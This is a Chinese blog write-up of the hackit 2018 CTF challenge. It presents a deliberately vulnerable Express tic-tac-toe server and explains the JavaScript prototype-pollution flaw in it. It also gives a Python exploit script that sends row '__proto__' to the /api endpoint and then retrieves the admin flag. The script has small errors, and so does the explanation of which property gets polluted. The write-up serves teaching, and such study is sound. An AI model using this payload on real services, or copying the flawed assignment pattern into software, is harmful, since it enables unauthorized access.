一道简单的JavaScript原型链污染例题:hackit 2018

目录

简介

代码

环境配置

漏洞分析

结果


简介

任何对象都有prototype属性,这个属性就是实例对象的原型对象,然后原型对象上如果添加一个属性,所有实例都会共享这个属性。比如object的tostring方法。这个原型对象的属性绑定在构造函数上,且当实例对象有某个属性或方法就不会再去原型对象找这个方法或属性。

然后__proto__可以指向当前对象的原型对象。我们对__proto__赋值就可以修改原型对象的值

代码

javascript 复制代码
const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}

function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.que
        rytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

(上述代码再node环境下运行)

环境配置

下载node网址:https://nodejs.org/zh-cn

下载node后,并安装后,再去配置该漏洞所需依赖

在你的漏洞路径下执行npm install命令,下面是json文件,下面代码终start字段后面是你的上面漏洞代码的文件名称

json文件

javascript 复制代码
{"name": "my-node-app",
"version":"1.0.6",
"description": "A simple Node.js app for tic-tac-toe game with express,hbs,and md5.",
"main": "app.js",
"scripts":{
    "start": "node app.js"
    },
"dependencies":{
    "body-parser":"^1.20.2",
    "express":"^4.18.2",
    "hbs": "^4.2.0",
    "md5": "^2.3.0",
    "morgan-body":"^2.6.9"
},
"authop": "",
"license":"ISC"
}

安装好后使用这个命令type app.js创建app.js文件,然后使用node app.js执行,如下图

现在就可以访问3000端口,进入漏洞了

漏洞分析

在这里用户是可控的

然后我们输入matrix[proto][admintoken],来污染他的原型链,然后在这里req就找不到querytoken然后他就会去他的原型对象找但是原型对象已经被咱污染了,所以原型对象的querytoken就是咱输入的值,然后再get传入user.admintoken的值和咱刚刚的污染req的原型对象里面的这个属性的值一样就可以了

污染的脚本

javascript 复制代码
import requests
import json
url1 = "http://127.0.0.1:3000/api"
url2 = "http://127.0.0.1:3000/admin?querytoken=e10adc3949ba59abbe56e057f20f883e"
s = requests.session()
//创建一个会话对象,会话对象可以保存一些同一个会话中提交的数据
headers = {"Content-Type":"application/json"}
data1 = {"row":"__proto__","col":"admintoken","data" : "123456"}
//使用s对象发起一个post请求,请求数据转化为json字符串
res1 = s.post(url1,headers=headers,data = json.dumps(data1))
//再使用s对象
res2 = s.get(url2)
print(res2.text)

结果

相关推荐
ZJ_.2 分钟前
WPSJS:让 WPS 办公与 JavaScript 完美联动
开发语言·前端·javascript·vscode·ecmascript·wps
GIS开发特训营6 分钟前
Vue零基础教程|从前端框架到GIS开发系列课程(七)响应式系统介绍
前端·vue.js·前端框架·gis开发·webgis·三维gis
Cachel wood32 分钟前
python round四舍五入和decimal库精确四舍五入
java·linux·前端·数据库·vue.js·python·前端框架
学代码的小前端33 分钟前
0基础学前端-----CSS DAY9
前端·css
joan_8537 分钟前
layui表格templet图片渲染--模板字符串和字符串拼接
前端·javascript·layui
m0_748236111 小时前
Calcite Web 项目常见问题解决方案
开发语言·前端·rust
Watermelo6171 小时前
详解js柯里化原理及用法,探究柯里化在Redux Selector 的场景模拟、构建复杂的数据流管道、优化深度嵌套函数中的精妙应用
开发语言·前端·javascript·算法·数据挖掘·数据分析·ecmascript
m0_748248941 小时前
HTML5系列(11)-- Web 无障碍开发指南
前端·html·html5
m0_748235612 小时前
从零开始学前端之HTML(三)
前端·html
一个处女座的程序猿O(∩_∩)O3 小时前
小型 Vue 项目,该不该用 Pinia 、Vuex呢?
前端·javascript·vue.js